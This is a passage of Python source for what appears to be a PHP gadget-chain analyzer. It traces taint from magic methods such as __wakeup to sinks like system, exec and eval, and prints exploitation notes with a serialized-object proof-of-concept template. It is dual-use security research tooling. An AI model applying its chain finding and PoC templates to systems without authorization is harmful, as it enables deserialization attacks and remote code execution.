def _process_property_access(self, node: Dict, line: int):
"""Process property access: $obj->prop"""
children = node.get('children', {})
expr = children.get('expr')
prop_node = children.get('prop')
var_name = self._get_var_name(expr)
prop_name = self._get_name(prop_node)
if prop_name and self.current_class and self.current_method:
access = PropertyAccess(
class_name=self.current_class,
method_name=self.current_method,
property_name=prop_name,
access_type='read',
line=line
)
self.property_accesses.append(access)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['property_accesses'].append({
'name': prop_name,
'variable': var_name,
'line': line
})
def _process_tostring_trigger(self, node: Dict, line: int):
"""Handle implicit __toString triggers like echo, print, concat"""
kind = node.get('kind')
children = node.get('children', {})
flags = node.get('flags', 0)
candidates = []
if kind == 'AST_BINARY_OP' and flags == 8: # BINARY_CONCAT
candidates.append(children.get('left'))
candidates.append(children.get('right'))
elif kind == 'AST_ASSIGN_OP' and flags == 264: # ASSIGN_CONCAT
candidates.append(children.get('var'))
candidates.append(children.get('expr'))
elif kind == 'AST_ECHO':
if isinstance(children, dict):
candidates.append(children)
elif isinstance(children, list):
candidates.extend(children)
elif kind == 'AST_PRINT':
candidates.append(children.get('expr'))
elif kind == 'AST_CAST' and flags == 2: # TYPE_STRING
candidates.append(children.get('expr'))
for candidate in candidates:
if not isinstance(candidate, dict):
continue
var_name = self._get_var_name(candidate)
target_class = None
if var_name == 'this':
target_class = self.current_class
# Identify property access if possible for better reporting
prop_name = None
if candidate.get('kind') == 'AST_PROP':
prop_children = candidate.get('children', {})
name_node = prop_children.get('prop')
prop_name = self._get_name(name_node)
if self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=target_class,
callee_method='__toString',
call_type='method',
line=line,
variable=var_name
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
entry = {
'type': 'method',
'name': '__toString',
'variable': var_name,
'target_class': target_class,
'line': line,
'implicit': True
}
self.methods[method_key]['calls'].append(entry)
def _extract_params(self, params_node: Dict) -> List[str]:
"""Extract parameter names from AST_PARAM_LIST"""
if not params_node:
return []
params = []
children = params_node.get('children')
if isinstance(children, list):
for param in children:
if isinstance(param, dict):
name_node = param.get('children', {}).get('name')
param_name = self._get_name(name_node)
if param_name:
params.append(param_name)
return params
def _get_name(self, node: Any) -> Optional[str]:
"""Extract name from various node types - with recursion protection"""
if node is None:
return None
if isinstance(node, str):
return node
if not isinstance(node, dict):
return None
# Avoid infinite recursion
max_depth = 5
depth = 0
current = node
while depth < max_depth:
if not isinstance(current, dict):
break
kind = current.get('kind')
children = current.get('children', {})
if kind == 'AST_VAR':
return None
if kind == 'AST_NAME':
return children.get('name')
elif 'name' in children:
name_val = children.get('name')
if isinstance(name_val, str):
return name_val
elif isinstance(name_val, dict):
current = name_val
depth += 1
else:
return None
else:
return None
return None
def _get_var_name(self, node: Any) -> Optional[str]:
"""Extract variable name from VAR node - with recursion protection"""
if not isinstance(node, dict):
return None
kind = node.get('kind')
children = node.get('children', {})
if kind == 'AST_VAR':
name_node = children.get('name')
if isinstance(name_node, str):
return name_node
return self._get_name(name_node)
return None
def _extract_name_list(self, node: Any) -> List[str]:
"""Extract a list of names from AST_NAME_LIST or similar structures"""
names: List[str] = []
if node is None:
return names
if isinstance(node, list):
for child in node:
names.extend(self._extract_name_list(child))
return names
if isinstance(node, str):
names.append(node)
return names
if not isinstance(node, dict):
return names
kind = node.get('kind')
children = node.get('children', [])
if kind == 'AST_NAME_LIST' and isinstance(children, list):
for child in children:
name = self._get_name(child)
if name:
names.append(name)
else:
name = self._get_name(node)
if name:
names.append(name)
return names
def _normalize_class_reference(self, class_name: Optional[str]) -> Optional[str]:
"""Normalize class references like self/static/parent to concrete names"""
if not class_name:
return None
lowered = class_name.lower()
if lowered in {'self', 'static'}:
return self.current_class
if lowered == 'parent':
if self.current_class and self.current_class in self.classes:
return self.classes[self.current_class].get('parent')
return None
return class_name
def resolve_method_in_hierarchy(self, class_name: Optional[str], method_name: str) -> Optional[str]:
"""Resolve a method by searching a class and its ancestors"""
if not class_name or not method_name:
return None
visited: Set[str] = set()
current = class_name
while current and current not in visited:
visited.add(current)
method_key = f"{current}::{method_name}"
if method_key in self.methods:
return method_key
class_data = self.classes.get(current)
current = class_data.get('parent') if class_data else None
return None
def find_method_by_name(self, method_name: str) -> Optional[str]:
"""Find the first method matching the provided name anywhere"""
if not method_name:
return None
for method_key in self.methods:
if method_key.endswith(f"::{method_name}"):
return method_key
return None
def get_class_lineage(self, class_name: Optional[str]) -> List[str]:
"""Return ordered list of class and its ancestors"""
lineage: List[str] = []
if not class_name:
return lineage
visited: Set[str] = set()
current = class_name
while current and current not in visited:
lineage.append(current)
visited.add(current)
class_data = self.classes.get(current)
current = class_data.get('parent') if class_data else None
return lineage
class AdvancedTaintAnalyzer:
"""Multi-level taint analyzer with object injection detection"""
SINKS = {
'rce': {'eval', 'system', 'exec', 'passthru', 'shell_exec', 'popen',
'proc_open', 'pcntl_exec', 'create_function', '`'},
'file_ops': {'file_put_contents', 'fopen', 'file_get_contents', 'fwrite',
'unlink', 'rmdir', 'rename', 'copy', 'move_uploaded_file', 'fread'},
'code_inclusion': {'include', 'require', 'include_once', 'require_once'},
'reflection': {'call_user_func', 'call_user_func_array', 'call_user_method',
'forward_static_call', 'ReflectionFunction', 'ReflectionMethod'},
'sql': {'mysql_query', 'mysqli_query', 'pg_query', 'sqlite_query', 'query'},
'command': {'shell_exec', 'proc_open', 'popen', 'passthru'}
}
MAGIC_METHODS = {
'__destruct', '__call', '__callStatic', '__get',
'__set', '__isset', '__unset', '__sleep', '__wakeup', '__toString',
'__invoke', '__set_state', '__clone', '__debugInfo', '__serialize',
'__unserialize', 'offsetGet'
}
SAFE_PHP_FUNCTIONS = {
# Strings
# 'strlen', 'strpos', 'strrpos', 'substr', 'str_replace', 'str_repeat',
# 'strtoupper', 'strtolower', 'trim', 'rtrim', 'ltrim', 'implode', 'explode',
# 'sprintf', 'vsprintf', 'addslashes', 'stripslashes', 'htmlspecialchars',
# 'htmlentities', 'urlencode', 'urldecode', 'base64_encode', 'base64_decode',
# 'json_encode', 'json_decode', 'serialize', 'unserialize', 'nl2br', 'chop',
# 'chr', 'ord', 'str_split', 'str_word_count', 'strcmp', 'strcasecmp',
# 'ucfirst', 'ucwords', 'md5', 'sha1', 'hash', 'crc32', 'lcfirst', 'number_format',
# 'str_pad', 'str_shuffle', 'strrev', 'strstr', 'strtok', 'wordwrap',
# Arrays
# 'count', 'sizeof', 'array_key_exists', 'array_keys', 'array_values',
# 'array_map', 'array_filter', 'array_merge', 'array_pop', 'array_push',
# 'array_shift', 'array_unshift', 'array_slice', 'array_splice', 'in_array',
# 'compact', 'extract', 'range', 'sort', 'rsort', 'asort', 'arsort',
# 'ksort', 'krsort', 'usort', 'uasort', 'uksort', 'shuffle', 'array_flip',
# 'array_reverse', 'array_search', 'array_sum', 'array_unique', 'array_combine',
# 'array_chunk', 'array_column', 'array_count_values', 'array_diff',
# 'array_diff_assoc', 'array_diff_key', 'array_fill', 'array_fill_keys',
# 'array_intersect', 'array_intersect_assoc', 'array_intersect_key',
# 'array_multisort', 'array_pad', 'array_product', 'array_rand',
# 'array_replace', 'array_replace_recursive', 'array_walk', 'array_walk_recursive',
# 'current', 'each', 'end', 'key', 'list', 'next', 'pos', 'prev', 'reset',
# Types/Validation
# 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int',
# 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real',
# 'is_resource', 'is_scalar', 'is_string', 'isset', 'empty', 'defined',
# 'intval', 'floatval', 'strval', 'boolval', 'gettype', 'settype',
# 'is_countable', 'is_iterable',
# Objects/Classes
# 'function_exists', 'class_exists', 'method_exists', 'property_exists',
# 'is_a', 'is_subclass_of', 'get_class', 'get_called_class', 'get_parent_class',
# 'get_object_vars', 'get_class_methods', 'get_class_vars', 'trait_exists',
# 'interface_exists',
# Date/Time
# 'date', 'time', 'strtotime', 'microtime', 'mktime', 'gmdate', 'idate',
# 'checkdate', 'date_create', 'date_format', 'date_diff', 'date_add',
# 'date_sub', 'date_interval_create_from_date_string', 'getdate',
# File/Path (Non-destructive/Non-reading content)
'dirname', 'basename', 'pathinfo', 'file_exists', 'is_dir', 'is_file',
'is_readable', 'is_writable', 'is_executable', 'is_link', 'stat',
'filesize', 'filemtime', 'filectime', 'fileatime', 'glob', 'disk_free_space',
'disk_total_space', 'getcwd', 'realpath',
# Math
# 'abs', 'ceil', 'floor', 'round', 'max', 'min', 'rand', 'mt_rand',
# 'sqrt', 'pow', 'exp', 'log', 'sin', 'cos', 'tan', 'pi', 'bindec',
# 'decbin', 'dechex', 'hexdec', 'octdec', 'decoct', 'fmod', 'hypot',
# 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
# Output/Control
# 'header', 'setcookie', 'die', 'exit', 'define', 'constant',
# 'error_log', 'trigger_error', 'debug_backtrace', 'print_r', 'var_dump',
# 'var_export', 'printf', 'vprintf', 'sleep', 'usleep',
# Regex
# 'preg_match', 'preg_match_all', 'preg_replace', 'preg_split', 'preg_quote',
# 'preg_grep', 'preg_replace_callback',
# Misc
# 'version_compare', 'extension_loaded', 'phpversion', 'ini_get', 'getenv',
# 'putenv', 'set_time_limit', 'ignore_user_abort', 'uniqid',
# 'get_defined_constants', 'get_defined_functions', 'get_defined_vars',
# 'get_included_files', 'get_required_files', 'memory_get_usage',
# 'memory_get_peak_usage', 'register_shutdown_function'
}
ENTRY_POINTS = {'__wakeup', '__destruct', '__toString', '__unserialize', 'offsetGet'}
def __init__(self, walker: ASTWalker):
self.walker = walker
self.taint_sources: List[TaintSource] = []
self.taint_sinks: List[TaintSink] = []
self.tainted_properties: Dict[str, Set[str]] = defaultdict(set)
self.tainted_methods: Dict[str, float] = {}
self.call_graph: Dict[str, List[CallSite]] = defaultdict(list)
self.sinks_normalized = {
category: {func.lower() for func in functions}
for category, functions in self.SINKS.items()
}
# Add patterns for dynamic calls with multiple arguments (potential RCE via call_user_func etc)
# but also simple variable function calls like $k($v)
def analyze(self, stream_output: bool = True) -> List[GadgetChain]:
"""Perform comprehensive taint analysis with optional streaming output"""
if stream_output:
print("\n" + "="*100)
print(" 🔍 LIVE GADGET CHAIN DETECTION")
print("="*100 + "\n")
print(" [1/6] Identifying taint sources...")
self._identify_taint_sources()
print(f" ✓ Found {len(self.taint_sources)} taint sources")
print(" [2/6] Identifying dangerous sinks...")
self._identify_sinks()
print(f" ✓ Found {len(self.taint_sinks)} dangerous sinks")
print(" [3/6] Building call graph...")
self._build_call_graph()
print(f" ✓ Built call graph with {len(self.call_graph)} nodes")
print(" [4/6] Propagating taint (multi-level)...")
self._propagate_taint_multi_level()
print(" [5/6] Analyzing object injection points...")
injectable = self._analyze_injectable_objects()
print(f" ✓ Found {len(injectable)} injectable classes")
print(" [6/6] Detecting exploitable gadget chains...")
if stream_output:
print("\n" + "-"*100)
print(" 🎯 DETECTED CHAINS (streaming results)")
print("-"*100 + "\n")
chains = self._detect_gadget_chains_streaming(injectable, stream_output)
if stream_output:
print("\n" + "="*100)
print(f" ✅ ANALYSIS COMPLETE: {len(chains)} total chains detected")
print("="*100 + "\n")
return chains
def _identify_taint_sources(self):
"""Identify taint sources from magic methods and properties"""
for method_key, method_data in self.walker.methods.items():
method_name = method_data['name']
if not method_data['is_magic'] and method_name not in self.ENTRY_POINTS:
continue
class_name = method_data['class']
confidence = 0.95 if method_name in self.ENTRY_POINTS else 0.7
# Properties accessed in magic methods are tainted
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
self.tainted_properties[class_name].add(prop_name)
source = TaintSource(
name=f"Property in {method_name}",
class_name=class_name,
method_name=method_name,
variable=f"$this->{prop_name}",
location=method_key,
source_type='property',
confidence=confidence
)
self.taint_sources.append(source)
# Mark magic method itself as tainted
self.tainted_methods[method_key] = confidence
def _identify_sinks(self):
"""Identify all dangerous sinks"""
for method_key, method_data in self.walker.methods.items():
for call_info in method_data.get('calls', []):
if call_info.get('type') != 'function':
continue
func_name = (call_info.get('name') or '').strip()
if not func_name:
continue
func_name_lower = func_name.lower()
# Check if it's a dangerous function
for category, functions in self.sinks_normalized.items():
if func_name_lower in functions:
severity = self._get_severity(category)
sink = TaintSink(
name=f"{category} sink",
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=func_name,
severity=severity,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
# Check for unknown/suspicious functions
if call_info.get('type') == 'function' and not call_info.get('variable_call'):
if func_name_lower not in self.SAFE_PHP_FUNCTIONS:
# If it's not a known sink and not a safe function, treat as suspicious
# We skip if it's a known sink (already handled above)
is_known_sink = False
for functions in self.sinks_normalized.values():
if func_name_lower in functions:
is_known_sink = True
break
if not is_known_sink:
sink = TaintSink(
name="Suspicious Function",
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=func_name,
severity=TaintLevel.LOW,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
# Check for variable function calls or dynamic instantiation
if (call_info.get('type') == 'function' or call_info.get('type') == 'new') and call_info.get('variable_call'):
func_name_sink = call_info.get('name')
is_new = call_info.get('type') == 'new'
display_name = f"new ${func_name_sink}(...)" if is_new else f"${func_name_sink}(...)"
sink_name = "Dynamic Instantiation" if is_new else "Dynamic Variable Call"
sink = TaintSink(
name=sink_name,
class_name=method_data['class'],
method_name=method_data['name'],
filepath=method_data.get('filepath', ''),
location=method_key,
function=display_name,
severity=TaintLevel.CRITICAL,
line=call_info.get('line', 0)
)
self.taint_sinks.append(sink)
def _get_severity(self, category: str) -> TaintLevel:
"""Map sink category to severity"""
severity_map = {
'rce': TaintLevel.CRITICAL,
'code_inclusion': TaintLevel.CRITICAL,
'deserialization': TaintLevel.CRITICAL,
'command': TaintLevel.CRITICAL,
'file_ops': TaintLevel.HIGH,
'reflection': TaintLevel.HIGH,
'sql': TaintLevel.HIGH
}
return severity_map.get(category, TaintLevel.MEDIUM)
def _build_call_graph(self):
"""Build comprehensive call graph"""
for call_site in self.walker.calls:
caller_key = f"{call_site.caller_class}::{call_site.caller_method}"
self.call_graph[caller_key].append(call_site)
def _propagate_taint_multi_level(self):
"""Multi-level taint propagation"""
max_iterations = 10
iteration = 0
while iteration < max_iterations:
changed = False
iteration += 1
for method_key, method_data in self.walker.methods.items():
class_name = method_data['class']
# If method accesses tainted properties, mark it as tainted
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
if prop_name in self.tainted_properties[class_name]:
if method_key not in self.tainted_methods:
self.tainted_methods[method_key] = 0.8
changed = True
# Propagate taint through calls
if method_key in self.tainted_methods:
for call_site in self.call_graph.get(method_key, []):
# Find the called method
callee_key = None
if call_site.callee_class:
callee_key = self.walker.resolve_method_in_hierarchy(
call_site.callee_class,
call_site.callee_method
)
else:
# Try to resolve the method
callee_key = self._resolve_method(
call_site.callee_method,
call_site.variable,
class_name
)
if callee_key and callee_key in self.walker.methods:
if callee_key not in self.tainted_methods:
# Propagate with reduced confidence
confidence = self.tainted_methods[method_key] * 0.9
self.tainted_methods[callee_key] = confidence
changed = True
else:
# Try fallback to __call or implicit __invoke
fallback_key = None
# 1. __call fallback (if method call and not found)
if call_site.call_type == 'method' and call_site.callee_class:
fallback_key = self.walker.resolve_method_in_hierarchy(
call_site.callee_class, '__call'
)
# 2. __invoke fallback (if variable call)
# Only if variable_call is marked in method data (not just call_site, which doesn't have it directly unless we look it up)
# We can check call_site type or if resolve failed for variable call
if not fallback_key and call_site.call_type == 'function':
# It's a function call, maybe variable function?
# We need to check if it was a variable call. CallSite has 'variable' field? No, 'callee_method' has name.
# Wait, _process_call sets 'variable_call' in calls dict, but CallSite object only has names.
# However, if callee_method is a variable name (starts with $? no it holds the name).
# Actually _process_call sets callee_method=var_name if implicit.
# If we assume any unresolved variable function call could be __invoke:
# We check if we can find ANY class with __invoke that is relevant?
# Without type inference, we might just check if any class has __invoke.
# That is too broad.
# But if we have object injection context, maybe we assume valid object?
# For now, let's skip __invoke global search to avoid massive FPs, unless we track variable types.
pass
if fallback_key and fallback_key in self.walker.methods:
if fallback_key not in self.tainted_methods:
confidence = self.tainted_methods[method_key] * 0.85
self.tainted_methods[fallback_key] = confidence
changed = True
if not changed:
break
print(f" ✓ Taint propagated through {iteration} iterations")
print(f" ✓ Found {len(self.tainted_methods)} tainted methods")
def _resolve_method(self, method_name: str, variable: Optional[str], current_class: str) -> Optional[str]:
"""Resolve method call to actual method key"""
if not method_name:
return None
if variable == 'this':
method_key = self.walker.resolve_method_in_hierarchy(current_class, method_name)
if method_key:
return method_key
return self.walker.find_method_by_name(method_name)
def _class_has_entry_point(self, class_name: str) -> bool:
"""Determine if a class (or its ancestors) exposes an entry point"""
for entry in self.ENTRY_POINTS:
if self.walker.resolve_method_in_hierarchy(class_name, entry):
return True
return False
def _collect_injectable_properties(self, class_name: str) -> List[str]:
"""Collect unique property names accessed across class hierarchy"""
props: List[str] = []
seen: Set[str] = set()
for lineage_class in self.walker.get_class_lineage(class_name):
class_data = self.walker.classes.get(lineage_class)
if not class_data:
continue
for method_data in class_data['methods'].values():
for prop_access in method_data.get('property_accesses', []):
prop_name = prop_access['name']
if prop_name and prop_name not in seen:
seen.add(prop_name)
props.append(prop_name)
return props
def _analyze_injectable_objects(self) -> Dict[str, List[str]]:
"""Analyze which objects can be injected to trigger chains"""
injectable = {}
for class_name in self.walker.classes.keys():
if not self._class_has_entry_point(class_name):
continue
props = self._collect_injectable_properties(class_name)
injectable[class_name] = props
return injectable
def _detect_gadget_chains_streaming(self, injectable: Dict[str, List[str]],
stream_output: bool = True) -> List[GadgetChain]:
"""Detect exploitable gadget chains and stream results as found"""
chains = []
chain_id = 1
# Group sources by entry point for better progress tracking
sources_by_entry = defaultdict(list)
for source in self.taint_sources:
if source.source_type == 'property':
sources_by_entry[source.location].append(source)
total_entries = len(sources_by_entry)
processed = 0
# Find all paths from tainted methods to sinks
for entry_method, sources in sources_by_entry.items():
processed += 1
if stream_output and processed % 5 == 0:
print(f" ... scanning entry point {processed}/{total_entries}")
# Find paths to sinks
paths = self._find_paths_bfs(entry_method, max_depth=6)
for path_data in paths:
path, sink = path_data['path'], path_data['sink']
# Determine injectable objects for this chain
chain_injectable = []
for step in path:
method = step.get('method', '')
class_name = method.split('::')[0] if '::' in method else ''
if class_name in injectable:
chain_injectable.append({
'class': class_name,
'properties': injectable[class_name]
})
# Calculate confidence
confidence = self._calculate_confidence(path, sink, chain_injectable)
# Filter low confidence chains early
if confidence < 0.4:
continue
# Generate exploitation notes
exploit_notes = self._generate_exploit_notes(path, sink, chain_injectable)
chain = GadgetChain(
chain_id=chain_id,
entry_points=[entry_method],
chain_path=path,
sink=sink,
severity=sink.severity,
confidence=confidence,
description=self._generate_description(path, sink),
injectable_objects=chain_injectable,
exploitation_notes=exploit_notes
)
chains.append(chain)
# Stream output for this chain
if stream_output:
self._print_chain_summary(chain)
chain_id += 1
return chains
def _print_chain_summary(self, chain: GadgetChain):
"""Print a summary of detected chain immediately"""
severity_emoji = {
TaintLevel.CRITICAL: "🔴",
TaintLevel.HIGH: "🟠",
TaintLevel.MEDIUM: "🟡",
TaintLevel.LOW: "🟢"
}
emoji = severity_emoji.get(chain.severity, "⚪")
print(f"{emoji} CHAIN #{chain.chain_id} [{chain.severity.name}] Confidence: {chain.confidence:.0%}")
# Show short path
preview_steps = []
for step in chain.chain_path[:4]:
method = step.get('method', '?')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
location = f"{method_file}:{method_line}" if method_line else method_file
preview_steps.append(f"{method} ({location})")
if len(chain.chain_path) > 4:
preview_steps.append("...")
path_str = " → ".join(preview_steps)
print(f" Path: {path_str}")
sink_path = chain.sink.filepath or 'Unknown file'
print(f" Sink: {chain.sink.function}() at {sink_path}:{chain.sink.line}")
if chain.injectable_objects:
classes = [obj['class'] for obj in chain.injectable_objects[:2]]
print(f" Injectable: {', '.join(classes)}")
print()
def _find_paths_bfs(self, start_method: str, max_depth: int = 6) -> List[Dict]:
"""Find paths from start to sinks using BFS - optimized version"""
paths = []
start_step = self._create_path_step(start_method, step_type='entry')
queue = deque([(start_method, [start_step], 0)])
visited = set()
# Early termination if we find enough paths
max_paths_per_entry = 10
while queue and len(paths) < max_paths_per_entry:
current, path, depth = queue.popleft()
if depth > max_depth:
continue
state_key = (current, tuple(p['method'] for p in path))
if state_key in visited:
continue
visited.add(state_key)
# Check if current method contains sinks
for sink in self.taint_sinks:
sink_method = f"{sink.class_name}::{sink.method_name}"
if sink_method == current:
# Verify taint reaches sink
if self._verify_taint_flow(path):
paths.append({'path': path.copy(), 'sink': sink})
# Continue searching for more paths
# Don't expand too much if we already have paths from this entry
if len(paths) >= max_paths_per_entry:
break
# Follow calls
for call_site in self.call_graph.get(current, []):
if call_site.callee_class:
next_method = self.walker.resolve_method_in_hierarchy(
call_site.callee_class,
call_site.callee_method
)
else:
next_method = self._resolve_method(
call_site.callee_method,
call_site.variable,
call_site.caller_class
)
if next_method and next_method in self.walker.methods:
# Avoid revisiting in this path
if any(step['method'] == next_method for step in path):
continue
new_step = self._create_path_step(
next_method,
step_type='call',
call_type=call_site.call_type,
caller_method=current,
call_line=call_site.line
)
new_path = path + [new_step]
queue.append((next_method, new_path, depth + 1))
return paths
def _create_path_step(
self,
method_name: str,
step_type: str,
call_type: Optional[str] = None,
caller_method: Optional[str] = None,
call_line: Optional[int] = None
) -> Dict[str, Any]:
"""Build a standardized path step with metadata"""
method_info = self.walker.methods.get(method_name, {})
class_name = method_name.split('::')[0] if '::' in method_name else ''
method_file = method_info.get('filepath', '')
method_line = method_info.get('line', 0)
caller_info = self.walker.methods.get(caller_method, {}) if caller_method else {}
return {
'method': method_name,
'class': class_name,
'type': step_type,
'call_type': call_type or ('entry' if step_type == 'entry' else ''),
'method_file': method_file,
'method_line': method_line,
'line': call_line if call_line is not None else method_line,
'call_line': call_line if call_line is not None else 0,
'call_file': caller_info.get('filepath', ''),
}
def _verify_taint_flow(self, path: List[Dict]) -> bool:
"""Verify that taint flows through the path"""
for step in path:
method = step.get('method', '')
if method in self.tainted_methods:
return True
return False
def _calculate_confidence(self, path: List[Dict], sink: TaintSink,
injectable: List[Dict]) -> float:
"""Calculate confidence score"""
base = 0.6
# Shorter chains are more reliable
length_factor = max(0.3, 1.0 - (len(path) - 1) * 0.12)
# Entry point significance
entry = path[0].get('method', '')
entry_factor = 1.3 if any(ep in entry for ep in self.ENTRY_POINTS) else 1.0
# Severity factor
severity_map = {
TaintLevel.CRITICAL: 1.0,
TaintLevel.HIGH: 0.85,
TaintLevel.MEDIUM: 0.7,
TaintLevel.LOW: 0.5
}
severity_factor = severity_map.get(sink.severity, 0.5)
# Injectable objects increase confidence
inject_factor = 1.2 if injectable else 0.8
# Check if path has high-confidence taint
taint_factor = 1.0
for step in path:
method = step.get('method', '')
if method in self.tainted_methods:
taint_factor = max(taint_factor, self.tainted_methods[method])
confidence = min(0.99, base * length_factor * entry_factor * severity_factor * inject_factor * taint_factor)
return round(confidence, 2)
def _generate_description(self, path: List[Dict], sink: TaintSink) -> str:
"""Generate chain description"""
entry = path[0].get('method', 'Unknown')
def format_step(step: Dict[str, Any]) -> str:
method = step.get('method', '?')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
if method_line:
return f"{method} ({method_file}:{method_line})"
return f"{method} ({method_file})"
chain_str = " → ".join([format_step(p) for p in path])
return (f"Gadget chain from {entry} to {sink.function}(). "
f"Path: {chain_str}")
def _generate_exploit_notes(self, path: List[Dict], sink: TaintSink,
injectable: List[Dict]) -> str:
"""Generate detailed exploitation guidance"""
notes = []
entry = path[0].get('method', 'Unknown')
notes.append(f"**Entry Point:** {entry}")
sink_path = sink.filepath or 'Unknown file'
notes.append(f"**Sink:** {sink.function}() [{sink.severity.name}] at {sink_path}:{sink.line}")
notes.append(f"**Chain Length:** {len(path)} steps\n")
if injectable:
notes.append("**Injectable Classes:**")
for obj in injectable:
cls = obj['class']
props = obj['properties']
notes.append(f" • {cls}")
if props:
notes.append(f" Properties: {', '.join(props[:5])}")
if len(props) > 5:
notes.append(f" ... and {len(props) - 5} more")
notes.append("")
# Add PoC template
if injectable and any('__wakeup' in entry or '__destruct' in entry for entry in [path[0].get('method', '')]):
notes.append("**Proof of Concept:**")
notes.append("```php")
target_class = injectable[0]['class']
target_props = injectable[0]['properties']
notes.append(f"$exploit = new {target_class}();")
for prop in target_props[:3]:
notes.append(f"$exploit->{prop} = 'PAYLOAD'; // Control this")
notes.append("$serialized = serialize($exploit);")
notes.append("// Trigger: unserialize($serialized);")
notes.append("```\n")
# Add chain visualization
notes.append("**Execution Flow:**")
for i, step in enumerate(path, 1):
method = step.get('method', 'Unknown')
call_type = step.get('call_type', 'entry')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
call_file = step.get('call_file') or 'Unknown file'
call_line = step.get('call_line', 0)
base = f" {i}. {method} [{call_type}]"
location = f"{method_file}:{method_line}" if method_line else method_file
base += f" — defined at {location}"
if call_type != 'entry':
if call_line:
call_location = f"{call_file}:{call_line}"
else:
call_location = call_file
base += f" (invoked from {call_location})"
notes.append(base)
return "\n".join(notes)
class Reporter:
"""Enhanced reporter"""
def __init__(self):
self.chains: List[GadgetChain] = []
def add_chains(self, chains: List[GadgetChain]):
self.chains.extend(chains)
def generate_text_report(self) -> str:
"""Generate detailed text report"""
if not self.chains:
return "\n✓ No gadget chains detected.\n"
lines = []
lines.append("\n" + "=" * 100)
lines.append(" PHP GADGET CHAIN ANALYSIS - DETAILED REPORT")
lines.append("=" * 100)
lines.append(f"\nTotal Chains: {len(self.chains)}")
# Statistics
by_severity = defaultdict(int)
for chain in self.chains:
by_severity[chain.severity.name] += 1
lines.append("\nSeverity Breakdown:")
for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
count = by_severity.get(severity, 0)
if count > 0:
lines.append(f" 🔴 {severity}: {count}")
lines.append("\n" + "=" * 100)
# Sort by severity and confidence
sorted_chains = sorted(
self.chains,
key=lambda c: (c.severity.value, c.confidence),
reverse=True
)
for chain in sorted_chains:
lines.append(f"\n{'='*100}")
lines.append(f"🔴 CHAIN #{chain.chain_id} - {chain.severity.name} SEVERITY (Confidence: {chain.confidence:.0%})")
lines.append("="*100)
sink_path = chain.sink.filepath or 'Unknown file'
lines.append(f"\nSink Location: {sink_path}:{chain.sink.line}")
lines.append("\nExecution Flow:")
for step in chain.chain_path:
method = step.get('method', 'Unknown')
call_type = step.get('call_type', 'entry')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
call_file = step.get('call_file') or 'Unknown file'
call_line = step.get('call_line', 0)
location = f"{method_file}:{method_line}" if method_line else method_file
entry = f" • {method} [{call_type}] — defined at {location}"
if call_type != 'entry':
call_location = f"{call_file}:{call_line}" if call_line else call_file
entry += f" (invoked from {call_location})"
lines.append(entry)
lines.append(f"\n{chain.description}\n")
lines.append(chain.exploitation_notes)
lines.append("")
lines.append("="*100)
return "\n".join(lines)
def generate_json_report(self) -> str:
"""Generate JSON report"""
data = {
'total_chains': len(self.chains),
'severity_breakdown': {},
'chains': []
}
# Calculate severity breakdown
by_severity = defaultdict(int)
for chain in self.chains:
by_severity[chain.severity.name] += 1
data['severity_breakdown'] = dict(by_severity)
# Add chain details
for chain in self.chains:
data['chains'].append({
'id': chain.chain_id,
'severity': chain.severity.name,
'confidence': chain.confidence,
'entry_points': chain.entry_points,
'sink': {
'function': chain.sink.function,
'location': chain.sink.location,
'filepath': chain.sink.filepath,
'severity': chain.sink.severity.name,
'line': chain.sink.line
},
'path': [
{
'method': step.get('method', ''),
'class': step.get('class', ''),
'type': step.get('type', ''),
'call_type': step.get('call_type', ''),
'method_file': step.get('method_file', ''),
'method_line': step.get('method_line', 0),
'call_file': step.get('call_file', ''),
'call_line': step.get('call_line', 0),
'line': step.get('line', 0)
}
for step in chain.chain_path
],
'injectable_objects': chain.injectable_objects,
'description': chain.description
})
return json.dumps(data, indent=2)
class GadgetChainAnalyzer:
"""Main analyzer orchestrator"""
def __init__(self):
try:
self.parser = PHPASTParser()
except RuntimeError as exc:
print(f"\n❌ Error: {exc}")
print("\nInstallation instructions:")
print(" 1. Ensure PHP ast extension is installed (e.g., sudo apt-get install php-ast)")
print(" 2. Or install python wrapper: pip install php-ast")
sys.exit(1)
self.reporter = Reporter()
def analyze_directory(self, directory: str, recursive: bool = True, stream_output: bool = True) -> List[GadgetChain]:
"""Analyze all PHP files in directory"""
print(f"\n📁 Scanning directory: {directory}")
print(f" Recursive mode: {'✓ enabled' if recursive else '✗ disabled'}")
php_files = self._find_php_files(directory, recursive)
if not php_files:
print("\n❌ No PHP files found!")
return []
print(f"\n📄 Found {len(php_files)} PHP file(s)\n")
# Parse all files
parsed_files = []
failed = 0
for i, php_file in enumerate(php_files, 1):
try:
print(f" [{i}/{len(php_files)}] Parsing: {php_file}")
parsed = self.parser.parse_file(php_file)
if parsed['success']:
parsed_files.append(parsed)
print(f" ✓ Success")
else:
print(f" ✗ Failed: {parsed.get('error', 'Unknown error')}")
failed += 1
except Exception as e:
print(f" ✗ Exception: {e}")
failed += 1
print(f"\n📊 Parsing complete: {len(parsed_files)} success, {failed} failed\n")
if not parsed_files:
print("❌ No files successfully parsed")
return []
# Walk AST
print("🔍 Analyzing AST...")
walker = ASTWalker()
for parsed_data in parsed_files:
walker.walk(parsed_data)
print(f" ✓ Found {len(walker.classes)} classes")
print(f" ✓ Found {len(walker.methods)} methods")
